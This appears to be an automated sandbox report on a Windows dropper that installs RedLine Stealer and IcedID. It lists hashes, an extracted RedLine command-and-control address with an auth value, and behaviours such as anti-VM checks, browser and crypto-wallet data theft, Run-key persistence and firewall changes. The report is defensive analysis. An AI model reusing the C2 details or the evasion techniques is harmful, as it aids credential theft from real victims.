Analysis
-
max time kernel
123s -
max time network
306s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
18-02-2022 01:20
Static task
static1
Behavioral task
behavioral1
Sample
win_setup__620eea0b11a3e.exe
Resource
win10v2004-en-20220112
General
-
Target
win_setup__620eea0b11a3e.exe
-
Size
7.0MB
-
MD5
90021c53649c314350fd3e9cca970d82
-
SHA1
b6bc62fab52efee5b2a8a930149480253bab6544
-
SHA256
8ecab59305943daf37f9de9924dbb11ecc24f2e610c889ee4541d47bf155c7e8
-
SHA512
616ca8784511aca210c81b43112694ca73e293d057f46f48069f5f6624163c41fcbcdb0fe9533cc85a97ae58a96716ae21f70c5fbcb997bd300921bbdcb656f0
Malware Config
Extracted
redline
media1530
92.255.57.154:11841
-
auth_value
0fca4b66c95739362b57ce7db49c6b9e
Extracted
icedid
1860595763
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4572 1228 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 19 IoCs
Processes:
resource yara_rule behavioral1/memory/4376-263-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/4960-271-0x0000000000CC0000-0x00000000011B1000-memory.dmp family_redline behavioral1/memory/5008-274-0x0000000000CC0000-0x00000000011B1000-memory.dmp family_redline behavioral1/memory/4896-273-0x0000000000CC0000-0x00000000011B1000-memory.dmp family_redline behavioral1/memory/4904-272-0x0000000000CC0000-0x00000000011B1000-memory.dmp family_redline behavioral1/memory/4860-275-0x0000000000CC0000-0x00000000011B1000-memory.dmp family_redline behavioral1/memory/4932-276-0x0000000000CC0000-0x00000000011B1000-memory.dmp family_redline behavioral1/memory/4896-295-0x0000000000CC0000-0x00000000011B1000-memory.dmp family_redline behavioral1/memory/5008-296-0x0000000000CC0000-0x00000000011B1000-memory.dmp family_redline behavioral1/memory/5008-302-0x0000000000CC0000-0x00000000011B1000-memory.dmp family_redline behavioral1/memory/4896-301-0x0000000000CC0000-0x00000000011B1000-memory.dmp family_redline behavioral1/memory/4960-303-0x0000000000CC0000-0x00000000011B1000-memory.dmp family_redline behavioral1/memory/4860-300-0x0000000000CC0000-0x00000000011B1000-memory.dmp family_redline behavioral1/memory/4904-299-0x0000000000CC0000-0x00000000011B1000-memory.dmp family_redline behavioral1/memory/4960-298-0x0000000000CC0000-0x00000000011B1000-memory.dmp family_redline behavioral1/memory/4932-297-0x0000000000CC0000-0x00000000011B1000-memory.dmp family_redline behavioral1/memory/4860-294-0x0000000000CC0000-0x00000000011B1000-memory.dmp family_redline behavioral1/memory/4932-293-0x0000000000CC0000-0x00000000011B1000-memory.dmp family_redline behavioral1/memory/4904-292-0x0000000000CC0000-0x00000000011B1000-memory.dmp family_redline -
Suspicious use of NtCreateProcessExOtherParentProcess 19 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.execmd.exeWerFault.exeWMIC.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeexplorer.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 1284 created 4032 1284 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe PID 4632 created 4376 4632 WerFault.exe cacls.exe PID 4728 created 4640 4728 WerFault.exe rundll32.exe PID 5036 created 4032 5036 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe PID 4272 created 3348 4272 cmd.exe 620ee9f8079d0_Fri009b6e1f0f0.exe PID 1152 created 4032 1152 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe PID 1236 created 4032 1236 620ee9f3162da_Fri00b5daea42.exe PID 5688 created 4032 5688 WMIC.exe 620ee9f3162da_Fri00b5daea42.exe PID 5884 created 4568 5884 WerFault.exe net1.exe PID 5576 created 4032 5576 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe PID 4360 created 4568 4360 WerFault.exe net1.exe PID 3528 created 4948 3528 WerFault.exe 6043857893.exe PID 4644 created 4568 4644 WerFault.exe net1.exe PID 5436 created 4032 5436 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe PID 1532 created 4568 1532 explorer.exe net1.exe PID 3096 created 4032 3096 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe PID 3232 created 4568 3232 WerFault.exe net1.exe PID 5672 created 4032 5672 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe PID 4600 created 4568 4600 WerFault.exe net1.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\libstdc++-6.dll aspack_v212_v242 -
Blocklisted process makes network request 9 IoCs
Processes:
rundll32.exeWMIC.execmd.exeflow pid process 33 180 rundll32.exe 37 180 rundll32.exe 53 3888 WMIC.exe 56 2800 cmd.exe 67 2800 cmd.exe 74 2800 cmd.exe 75 2800 cmd.exe 81 3888 WMIC.exe 82 3888 WMIC.exe -
Downloads MZ/PE file
-
Executes dropped EXE 44 IoCs
Processes:
setup_installer.exesetup_install.exe620ee9bc939e5_Fri001f6e5e.exe620ee9f8079d0_Fri009b6e1f0f0.exe620ee9f0f317f_Fri00dfd53221.exe620ee9bbbbcb5_Fri003a32992dd.exe620ee9bdae9b2_Fri00129f9288f5.exe620ee9f3162da_Fri00b5daea42.exe620ee9c09b72d_Fri00ef1dae.exe620ee9f4890f0_Fri00080e80.exe620eea0052b41_Fri0064244e526.exerundll32.exesihclient.exe620ee9c20f6fc_Fri00f49041.exe620ee9f904e5f_Fri008a64a161.exe620ee9f904e5f_Fri008a64a161.tmp620ee9c09b72d_Fri00ef1dae.tmp620ee9f6d521e_Fri005bb939a12f.exe620ee9bdae9b2_Fri00129f9288f5.execmd.exeConhost.exeLzmwAqmV.exe620ee9c09b72d_Fri00ef1dae.tmp5(6665____.exeFile.exeinst1.exe5776870174.exeFirst.execacls.exeWerFault.exeGDMD1.exeGDMD1.exeGDMD1.exeGDMD1.exeGDMD1.exeGDMD1.exeConhost.exe6365036327.exedllhostwin.exe6043857893.execacls.exe960B.exeSecond.exeCA1C.exepid process 3160 setup_installer.exe 444 setup_install.exe 3176 620ee9bc939e5_Fri001f6e5e.exe 3348 620ee9f8079d0_Fri009b6e1f0f0.exe 3196 620ee9f0f317f_Fri00dfd53221.exe 3888 620ee9bbbbcb5_Fri003a32992dd.exe 724 620ee9bdae9b2_Fri00129f9288f5.exe 4032 620ee9f3162da_Fri00b5daea42.exe 3848 620ee9c09b72d_Fri00ef1dae.exe 1560 620ee9f4890f0_Fri00080e80.exe 3204 620eea0052b41_Fri0064244e526.exe 180 rundll32.exe 2800 sihclient.exe 3712 620ee9c20f6fc_Fri00f49041.exe 2560 620ee9f904e5f_Fri008a64a161.exe 1760 620ee9f904e5f_Fri008a64a161.tmp 3508 620ee9c09b72d_Fri00ef1dae.tmp 2912 620ee9f6d521e_Fri005bb939a12f.exe 3252 620ee9bdae9b2_Fri00129f9288f5.exe 3144 cmd.exe 3952 Conhost.exe 3124 LzmwAqmV.exe 3248 620ee9c09b72d_Fri00ef1dae.tmp 4224 5(6665____.exe 4232 File.exe 4288 inst1.exe 4344 5776870174.exe 4368 First.exe 4376 cacls.exe 4828 WerFault.exe 4860 GDMD1.exe 4896 GDMD1.exe 4904 GDMD1.exe 4932 GDMD1.exe 4960 GDMD1.exe 5008 GDMD1.exe 5016 Conhost.exe 4568 6365036327.exe 4576 dllhostwin.exe 4948 6043857893.exe 5516 cacls.exe 5760 960B.exe 5780 Second.exe 5992 CA1C.exe -
Modifies Windows Firewall 1 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\11111.exe upx C:\Users\Admin\AppData\Local\Temp\11111.exe upx -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
620eea0052b41_Fri0064244e526.exeCA1C.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 620eea0052b41_Fri0064244e526.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion CA1C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion CA1C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 620eea0052b41_Fri0064244e526.exe -
Checks computer location settings 2 TTPs 11 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
setup_installer.exe620ee9bdae9b2_Fri00129f9288f5.exe620ee9c09b72d_Fri00ef1dae.tmprundll32.exe620ee9f8079d0_Fri009b6e1f0f0.exeFirst.exe620ee9f3162da_Fri00b5daea42.exewin_setup__620eea0b11a3e.exe620ee9f0f317f_Fri00dfd53221.exeLzmwAqmV.exeWMIC.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation setup_installer.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation 620ee9bdae9b2_Fri00129f9288f5.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation 620ee9c09b72d_Fri00ef1dae.tmp Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation rundll32.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation 620ee9f8079d0_Fri009b6e1f0f0.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation First.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation 620ee9f3162da_Fri00b5daea42.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation win_setup__620eea0b11a3e.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation 620ee9f0f317f_Fri00dfd53221.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation LzmwAqmV.exe Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation WMIC.exe -
Loads dropped DLL 12 IoCs
Processes:
setup_install.exe620ee9f904e5f_Fri008a64a161.tmp620ee9c09b72d_Fri00ef1dae.tmp620ee9c09b72d_Fri00ef1dae.tmprundll32.exerundll32.exepid process 444 setup_install.exe 444 setup_install.exe 444 setup_install.exe 444 setup_install.exe 444 setup_install.exe 444 setup_install.exe 1760 620ee9f904e5f_Fri008a64a161.tmp 3508 620ee9c09b72d_Fri00ef1dae.tmp 3248 620ee9c09b72d_Fri00ef1dae.tmp 180 rundll32.exe 180 rundll32.exe 4640 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\620eea0052b41_Fri0064244e526.exe themida C:\Users\Admin\AppData\Local\Temp\7zS85C45A7E\620eea0052b41_Fri0064244e526.exe themida behavioral1/memory/3204-262-0x00000000005D0000-0x0000000000992000-memory.dmp themida behavioral1/memory/3204-265-0x00000000005D0000-0x0000000000992000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
File.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce File.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" File.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
620eea0052b41_Fri0064244e526.exeCA1C.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 620eea0052b41_Fri0064244e526.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA CA1C.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 30 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
Processes:
620eea0052b41_Fri0064244e526.exeGDMD1.exeGDMD1.exeGDMD1.exeGDMD1.exeGDMD1.exeGDMD1.exeCA1C.exepid process 3204 620eea0052b41_Fri0064244e526.exe 4960 GDMD1.exe 4860 GDMD1.exe 4896 GDMD1.exe 4932 GDMD1.exe 4904 GDMD1.exe 5008 GDMD1.exe 5992 CA1C.exe 5992 CA1C.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
cmd.exe620ee9bc939e5_Fri001f6e5e.exedescription pid process target process PID 2800 set thread context of 2912 2800 cmd.exe 620ee9f6d521e_Fri005bb939a12f.exe PID 3176 set thread context of 4376 3176 620ee9bc939e5_Fri001f6e5e.exe cacls.exe -
Drops file in Program Files directory 3 IoCs
Processes:
620ee9c09b72d_Fri00ef1dae.tmpdescription ioc process File opened for modification C:\Program Files (x86)\AtomTweaker\unins000.dat 620ee9c09b72d_Fri00ef1dae.tmp File created C:\Program Files (x86)\AtomTweaker\unins000.dat 620ee9c09b72d_Fri00ef1dae.tmp File created C:\Program Files (x86)\AtomTweaker\is-BGE5T.tmp 620ee9c09b72d_Fri00ef1dae.tmp -
Drops file in Windows directory 4 IoCs
Processes:
TiWorker.exedescription ioc process File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe File opened for modification C:\Windows\WinSxS\pending.xml TiWorker.exe File created C:\Windows\Servicing\Sessions\30942318_1569274324.xml TiWorker.exe File opened for modification C:\Windows\Servicing\Sessions\30942318_1569274324.xml TiWorker.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 33 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4112 4032 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe 4752 4376 WerFault.exe 620ee9bc939e5_Fri001f6e5e.exe 4816 4640 WerFault.exe rundll32.exe 4276 4032 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe 4684 4032 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe 1464 3348 WerFault.exe 620ee9f8079d0_Fri009b6e1f0f0.exe 5184 4032 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe 5772 4032 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe 6000 4568 WerFault.exe 6365036327.exe 2944 4032 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe 808 4568 WerFault.exe 6365036327.exe 5176 4948 WerFault.exe 6043857893.exe 3240 4568 WerFault.exe 6365036327.exe 4828 4032 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe 5548 4568 WerFault.exe 6365036327.exe 5424 4032 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe 5792 4568 WerFault.exe 6365036327.exe 5832 4032 WerFault.exe 620ee9f3162da_Fri00b5daea42.exe 4124 4568 WerFault.exe 6365036327.exe 3644 3932 WerFault.exe explorer.exe 5732 2672 WerFault.exe 3912 4284 WerFault.exe 3256 5424 WerFault.exe 5420 4916 WerFault.exe 4172 5296 WerFault.exe 5300 3320 WerFault.exe 4288 3856 WerFault.exe 3964 4136 WerFault.exe 6092 5308 WerFault.exe 1136 3700 WerFault.exe 2328 6028 WerFault.exe 5912 1940 WerFault.exe 1092 5884 WerFault.exe -
Checks SCSI registry key(s) 3 TTPs 11 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
cacls.exevssvc.exe620ee9c20f6fc_Fri00f49041.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cacls.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cacls.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000002b5b8d01cc3769600000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800002b5b8d010000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3f000000ffffffff0000000007000100006809002b5b8d01000000000000d0120000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000002b5b8d0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000002b5b8d0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 620ee9c20f6fc_Fri00f49041.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 620ee9c20f6fc_Fri00f49041.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 620ee9c20f6fc_Fri00f49041.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Checks processor information in registry 2 TTPs 56 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeConhost.exeWerFault.exeWerFault.exeWerFault.exesvchost.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Conhost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Conhost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Conhost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString svchost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 5432 timeout.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 36 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exesvchost.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeConhost.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU svchost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS 